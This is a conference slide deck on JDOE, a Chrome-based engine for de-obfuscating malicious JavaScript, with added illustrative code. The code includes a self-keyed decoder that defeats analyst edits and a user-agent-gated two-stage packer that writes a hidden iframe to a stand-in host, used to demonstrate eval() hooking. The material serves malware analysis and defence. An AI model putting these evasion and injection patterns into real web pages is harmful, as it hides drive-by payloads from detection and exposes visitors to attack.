
1 JavaScript De-Obfuscation Engine -- JDOE
Nick Guo, Ulysses Wang

2 Agenda
- Obfuscation Introduction
- Anti de-obfuscation
- Browser Knowledge
- Current Solution
- JDOE
- Demo
- Challenge & Improvement

3 Obfuscation Introduction (Phase I Review)

4 Obfuscation
Concealing the intent of code by making it difficult for human analysis and for detection. It is used for:
- Copyright protection
- Hiding information (e.g. an email address)
- Evading detection

5 Obfuscation Types
Three types of obfuscation:
- Injection obfuscation
- Public packer obfuscation
- Exploit kit obfuscation

6 Obfuscation Types
"As recorded in 2007, over 80% of detected malicious code was already using obfuscation."
- Most obfuscation is simple: injection 83%, exploit kit < 1%
- Complex obfuscation is a small proportion of samples
- Obfuscation is becoming more complex

7 Anti de-obfuscation (JDOE Prototype)

8 Fragmentation
Splitting important code into pieces of JavaScript code, HTML code or external scripts.
- String concatenation: var temp = "get" + "Elem" + "ent" + "ById";
- Tag concatenation: put the content in separate tags (example: OpenSource exploit kit)

9 Fragmentation (cont.)
- File concatenation: put a critical function or data in another file (example: Phoenix Exploit Kit 2.5)
- Traffic concatenation: keep the data on the server; the client has to request it

10 External Access
Fetch an external resource or perform a connection check.
- Ajax fetch of data
- Connection check (example: Neosploit exploit kit)

11 Condition check
Browser detection: the user agent string is folded into a value that the script then depends on, so the code only decodes correctly in the targeted browser (IE6, Firefox, ...):

    var uas = navigator.userAgent, uai = 0, xor = 0;
    while (uai < uas.length) { xor += uas.charCodeAt(uai++); }
    // xor is later used as a key or as a branch condition

12 Condition check (cont.)
- Time check: getUTCFullYear(), getUTCMonth(), getUTCDate()
- Plugin check: new ActiveXObject('ShockwaveFlash.ShockwaveFlash') (IE); navigator.plugins (non-IE)

13 Trigger Function
- Trigger a function after a delay: setTimeout("alert('Hello!')", 3000); setInterval("clock()", 1000)
- Trigger a function on an event: <button id="j_id" onclick="j_function2();">, window.attachEvent or addEventListener
- Trigger a function from a plugin: call a JS function from ActionScript

14 Bypass de-obfuscation tools
- Uncommon tags
- Save content in CSS
- Modification check: the function reads its own source, so any patch by an analyst changes what it sees: var hybxs = arguments.callee; hybxs = hybxs.toString();
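An added example of the modification check on this slide (this is illustration written for this page, not code from the JDOE slides or from any exploit kit). The decoder derives its key from its own source text, so an analyst who inserts a trace line into it gets garbage instead of the payload. A named function expression (`me`) replaces the slide's `arguments.callee`; it gives the same self-reference and also works in strict mode. The payload, the xor encoding, the key derivation and the host name `example.invalid` are all constructed for the example.

```javascript
function sourceKey(src) {
  // Key derived from the decoder's own source text: sum of UTF-16 code units
  // mod 65536. Any edit to the function (an inserted console.log, a breakpoint
  // call, re-indentation) changes the sum and therefore the key.
  let k = 0;
  for (let i = 0; i < src.length; i++) k = (k + src.charCodeAt(i)) & 0xffff;
  return k;
}

function xorHex(text, key) {
  // "Build time" encoder: xor each code unit with the key, 4 hex digits each.
  return Array.from(text, (ch) => (ch.charCodeAt(0) ^ key).toString(16).padStart(4, "0")).join("");
}

function unxorHex(hex, key) {
  let out = "";
  for (let i = 0; i < hex.length; i += 4) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 4), 16) ^ key);
  }
  return out;
}

// The shipped decoder. `me` is the function expression's own name, so
// me.toString() is the source of whichever function object is running, the
// same self-reference the slide obtains with arguments.callee.
const decoder = function me(hex) {
  var key = sourceKey(me.toString());
  return unxorHex(hex, key);
};

// The obfuscator encrypts the payload under the key of the final decoder text.
// Constructed payload; example.invalid is a reserved name, not a real host.
const PAYLOAD = 'document.write("<iframe src=\'http://example.invalid/\'></iframe>")';
const CIPHERTEXT = xorHex(PAYLOAD, sourceKey(decoder.toString()));

// What happens when an analyst patches a trace into the decoder: the same code
// with one line inserted after the opening brace. A direct eval keeps
// sourceKey and unxorHex in scope for the copy.
function instrument(fn, injectedLine) {
  const src = fn.toString();
  const brace = src.indexOf("{") + 1;
  return eval("(" + src.slice(0, brace) + " " + injectedLine + src.slice(brace) + ")");
}

const patched = instrument(decoder, "console.log('decoder entered');");

function compare() {
  return { original: decoder(CIPHERTEXT), patched: patched(CIPHERTEXT) };
}
console.log(compare()); // original: the payload; patched: garbage, the key no longer matches
```

The check only defends against edits to the script itself. A tool that observes eval() and the final DOM from outside the script, as JDOE does, never changes the function's source and so takes the same path as a real browser.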

15 Browser Knowledge (JDOE Prototype)

16 Browser Component (diagram)

17 WebKit (diagram)

18 DOM Tree (diagram)

19 Current Solution (Phase I Review)

20 Jsunpack
- Lightweight: SpiderMonkey and Python
- Hooks set in a JS file
- Environment: DOM enumeration
- Detection module (Yara)
- PDF and SWF parser
- Intrusion detection (libnids)
- http://jsunpack.jeek.org/

21 Fireshark
- Firefox plugin
- Source code of the main window and child frames
- DOM tree of the main window and child frames
- HTTP requests and responses logged
- Malicious URL check
- URL redirection graph
- http://fireshark.org/

22 Malzilla
- Research tool
- SpiderMonkey
- Shellcode analysis
- Limited DOM support
- http://malzilla.sourceforge.net/

23 Limitations of the current solutions
- Firefox based
- Limited DOM support
- Limited de-obfuscation
- Performance

24 JDOE (Phase I Review)

25 JDOE: what engine do we want?
- High performance
- Good coverage
- Good output and log formats
- An analytics platform

26 JDOE
JDOE is based on Google Chrome.
- Render engine: WebKit (85% of the smartphone browser market, 21% of the desktop browser market); includes the DOM tree and the parser
- JavaScript engine: V8

27 Prototyping
JDOE is based on a test project for Chrome:
- Command line tool, feasible to port as a server-side application
- Able to simulate the basic functions of a browser
- Full DOM support
- Good fault tolerance for malformed HTML
- HTML-format output

28 JDOE Architecture (diagram)

29 JDOE advantages
- Based on Chrome and WebKit
- Strong parser
- Full DOM support
- Fast JS execution
- High coverage
- Good extensibility

30 De-obfuscation Method
- Hook eval(): captures the inner state of the JavaScript, i.e. every decoded stage handed to eval()
- Print the final DOM tree: captures the final state; document.write should add nodes to the DOM tree, so injected content ends up in the dump
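A minimal harness that applies the two techniques on this slide (hook eval(), keep what the sample writes into the page) to the fragmentation of slide 8 and the browser condition check of slide 11. This is an added example written for this page, not JDOE's own code: JDOE hooks the real V8 eval and prints the real WebKit DOM, whereas this harness binds the sample's `eval`, `document`, `navigator` and `window` to stand-ins via `new Function`, and records document.write() output instead of building a tree. The two-stage sample, the user agent strings and the host name `example.invalid` are constructed for the example.

```javascript
function makeFakeDocument() {
  // Stand-in for the DOM: JDOE prints the real final DOM tree; here we just
  // record the HTML the sample writes, which is what the final tree would gain.
  const written = [];
  return {
    write(html) { written.push(String(html)); },
    writeln(html) { written.push(String(html) + "\n"); },
    getWritten() { return written.join(""); },
  };
}

// Run `sample` with eval() hooked. Every string handed to eval() is logged with
// its nesting depth and then executed under the same hooks, so multi-stage
// packers unwrap stage by stage. A depth limit stops eval() recursion loops.
function deobfuscate(sample, opts = {}) {
  const evalLog = [];
  const document = makeFakeDocument();
  const navigator = { userAgent: opts.userAgent || "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" };
  const window = { document, navigator };
  const depthLimit = opts.depthLimit || 16;

  function run(code, depth) {
    // The sample's free references to eval/document/navigator/window bind to
    // these parameters, so the hooks take effect without touching real globals.
    const fn = new Function("eval", "document", "navigator", "window", String(code));
    const hookedEval = (inner) => {
      evalLog.push({ depth, code: String(inner) });
      if (depth + 1 > depthLimit) {
        throw new Error("eval() nesting exceeded " + depthLimit + ", possible anti-analysis loop");
      }
      return run(inner, depth + 1);
    };
    return fn(hookedEval, document, navigator, window);
  }

  run(sample, 0);
  return { evalLog, finalHtml: document.getWritten() };
}

function toCharCodes(s) {
  return Array.from(s, (ch) => ch.charCodeAt(0)).join(",");
}

// Constructed two-stage sample (example.invalid is a reserved name, not a real
// host). Stage 2 rebuilds an iframe tag from char codes and document.write()s
// it; stage 1 rebuilds stage 2 the same way and eval()s it, but only after a
// userAgent check like the one on slide 11, so a non-IE analysis environment
// never sees the payload.
const PAYLOAD_HTML = '<iframe src="http://example.invalid/" width="0" height="0"></iframe>';
const STAGE2 = "var s='';var c=[" + toCharCodes(PAYLOAD_HTML) + "];" +
  "for(var i=0;i<c.length;i++){s+=String.fromCharCode(c[i]);}document.write(s);";
const SAMPLE = "if(navigator.userAgent.indexOf('MSIE')!=-1){" +
  "var t='';var c=[" + toCharCodes(STAGE2) + "];" +
  "for(var i=0;i<c.length;i++){t+=String.fromCharCode(c[i]);}eval(t);}";

const FIREFOX_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0";

const asIE = deobfuscate(SAMPLE);
console.log("eval() calls seen:", asIE.evalLog.length);      // 1: the decoded stage 2
console.log("final page content:", asIE.finalHtml);          // the iframe tag
const asFirefox = deobfuscate(SAMPLE, { userAgent: FIREFOX_UA });
console.log("payload visible as Firefox:", asFirefox.finalHtml !== "");  // false
```

Two caveats a practitioner should keep in mind. First, the hooked eval() here returns undefined, while a real eval() returns the completion value of the code; samples that use `x = eval(...)` need the real engine, which is one reason JDOE hooks V8 rather than emulating it. Second, the Firefox run shows why coverage depends on the environment: with the wrong user agent the sample never calls eval() and the dump stays empty, which looks like a clean page rather than a failure.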

31 Exploit kit Coverage
- Samples from the Top 10 exploit kits project
- Total samples: 22; JDOE success: 20
- Coverage: 90.9%

32 Injection Coverage
- Samples from obfuscation ThreatID matches
- Total samples: 9,544; JDOE success: 8,450
- Coverage: 88.5%

33 Demo

34 Challenge & Improvement (Status and Next Step)

35 Challenges
- Security: how to keep the JDOE server secure while it executes hostile JavaScript? Upgrade plan; sandbox; JavaScript audit
- Performance: external access is disabled
- Coverage: some special samples are not supported; output format is defective on some special samples

36 Auto analysis platform improvement
- More trigger function handlers
- PDF and SWF parser
- Shellcode detection
- JavaScript audit
- Cloud-based integration: http://aceinsight.websense.com/

37 Questions?

